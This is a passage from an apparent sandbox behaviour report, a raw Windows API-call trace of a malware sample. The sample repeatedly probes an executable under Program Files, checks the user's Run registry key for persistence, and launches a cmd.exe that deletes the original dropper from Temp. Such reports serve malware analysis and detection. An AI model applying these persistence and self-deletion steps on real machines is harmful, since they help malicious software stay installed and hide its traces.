Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.106] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0113.106] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program 
Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.106] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0113.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0113.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0113.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0113.158] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0118.160] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0118.160] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0118.160] NtClose 
(Handle=0x124) returned 0x0 [0118.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.160] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0118.160] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.160] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0118.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0118.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, 
SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0118.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0118.200] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0123.199] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0123.199] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0123.199] NtClose (Handle=0x124) returned 0x0 [0123.199] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0123.199] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0123.199] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", 
NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0123.199] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0123.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0123.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0123.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0123.238] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0128.237] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0128.237] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | 
out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0128.237] NtClose (Handle=0x124) returned 0x0 [0128.237] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0128.237] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0128.238] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0128.238] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0128.238] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, 
RegionSize=0x24e818*=0x10000) returned 0x0 [0128.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0128.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0128.277] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0133.276] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x124) returned 0x0 [0133.276] NtEnumerateValueKey (in: KeyHandle=0x124, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0133.276] NtClose (Handle=0x124) returned 0x0 [0133.277] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0133.277] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 
0xc000003a [0133.277] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0133.277] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0133.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0133.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0133.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0133.366] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) returned 0x0 [0138.362] NtCreateKey (in: KeyHandle=0x24e824, DesiredAccess=0x20219, ObjectAttributes=0x24df94*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-3328211038-939451286-342010794-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x24e824*=0x1ec) returned 0x0 [0138.362] NtEnumerateValueKey (in: 
KeyHandle=0x1ec, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x24e1e8, Length=0x200, ResultLength=0x24e5e8 | out: KeyValueInformation=0x24e1e8, ResultLength=0x24e5e8) returned 0x0 [0138.362] NtClose (Handle=0x1ec) returned 0x0 [0138.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e5d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.362] NtCreateFile (in: FileHandle=0x24e5f0, DesiredAccess=0x120089, ObjectAttributes=0x24e5b8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e5d8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e5f0*=0xffffffff, IoStatusBlock=0x24e5d8*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0138.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtPathName=0x24e7ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.362] NtCreateFile (in: FileHandle=0x24e80c, DesiredAccess=0x120089, ObjectAttributes=0x24e7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Crfitq6x\\gdigzvh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x24e7f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x24e80c*=0xffffffff, IoStatusBlock=0x24e7f4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0138.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x24e814*=0x0, ZeroBits=0x0, 
RegionSize=0x24e818*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x24e814*=0x630000, RegionSize=0x24e818*=0x10000) returned 0x0 [0138.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x630000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x630000, ResultLength=0x0) returned 0x0 [0138.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x24ee58*=0x630000, RegionSize=0x24ee5c, FreeType=0x8000) returned 0x0 [0138.401] NtDelayExecution (Alertable=0, Interval=0x24e824*=-50000000) Thread: id = 101 os_tid = 0xc7c Thread: id = 126 os_tid = 0xccc Thread: id = 127 os_tid = 0xcd0 Thread: id = 128 os_tid = 0xce0 Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7f1e6680" os_pid = "0xc80" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xbd4" cmd_line = "/c del \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1507 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1508 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1509 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1510 start_va = 0x170000 end_va = 0x26ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1511 start_va = 0x4a2d0000 end_va = 0x4a31bfff entry_point = 0x4a2d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1512 start_va = 0x76f50000 end_va = 0x7708bfff entry_point = 0x76f50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1513 start_va = 0x77190000 end_va = 0x77190fff entry_point = 0x77190000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1514 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1515 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1516 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1517 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1518 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1519 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1520 start_va = 0x270000 end_va = 0x2d6fff entry_point = 0x270000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1521 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000000300000" filename = "" Region: id = 1522 start_va = 0x6f1a0000 end_va = 0x6f1a6fff entry_point = 0x6f1a0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1523 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1524 start_va = 0x76460000 end_va = 0x76469fff entry_point = 0x76460000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1525 start_va = 0x765d0000 end_va = 0x7661dfff entry_point = 0x765d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1526 start_va = 0x76620000 end_va = 0x766e8fff entry_point = 0x76620000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1527 start_va = 0x76850000 end_va = 0x768ecfff entry_point = 0x76850000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1528 start_va = 0x76c10000 end_va = 0x76ce3fff entry_point = 0x76c10000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1529 start_va = 0x76e40000 end_va = 0x76eebfff entry_point = 0x76e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1530 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007f6f0000" filename = "" Region: id = 1531 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1532 start_va = 0x76470000 end_va = 0x7648efff entry_point = 0x76470000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1533 start_va = 0x76b40000 end_va = 0x76c0bfff entry_point = 0x76b40000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1534 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1535 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1536 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1537 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1538 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1539 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1540 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 102 os_tid = 0xc84 [0071.305] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fd2c | out: lpSystemTimeAsFileTime=0x26fd2c*(dwLowDateTime=0xacd08a10, dwHighDateTime=0x1d3799e)) [0071.305] GetCurrentProcessId () returned 0xc80 [0071.305] GetCurrentThreadId () returned 
0xc84 [0071.305] GetTickCount () returned 0x202cd [0071.305] QueryPerformanceCounter (in: lpPerformanceCount=0x26fd24 | out: lpPerformanceCount=0x26fd24*=500840814) returned 1 [0071.306] GetModuleHandleA (lpModuleName=0x0) returned 0x4a2d0000 [0071.306] __set_app_type (_Type=0x1) [0071.306] __p__fmode () returned 0x76ee31f4 [0071.306] __p__commode () returned 0x76ee31fc [0071.307] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a2f21a6) returned 0x0 [0071.307] __getmainargs (in: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c, _DoWildCard=0, _StartInfo=0x4a2f4140 | out: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c) returned 0 [0071.307] GetCurrentThreadId () returned 0xc84 [0071.307] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc84) returned 0x38 [0071.307] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c10000 [0071.307] GetProcAddress (hModule=0x76c10000, lpProcName="SetThreadUILanguage") returned 0x76c624c2 [0071.307] SetThreadUILanguage (LangId=0x0) returned 0x409 [0071.307] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.307] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fcbc | out: phkResult=0x26fcbc*=0x0) returned 0x2 [0071.307] VirtualQuery (in: lpAddress=0x26fcf3, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0071.307] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fc8c, dwLength=0x1c | out: lpBuffer=0x26fc8c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, 